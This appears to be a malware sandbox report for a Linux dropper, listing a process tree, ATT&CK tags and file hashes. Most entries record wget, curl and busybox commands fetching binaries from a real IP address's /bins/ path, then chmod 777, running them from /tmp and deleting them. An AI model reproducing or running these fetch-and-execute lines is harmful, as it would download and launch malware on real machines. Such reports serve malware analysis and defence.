/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:942
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:948
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:954
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:960
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:966
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:972
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:978
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97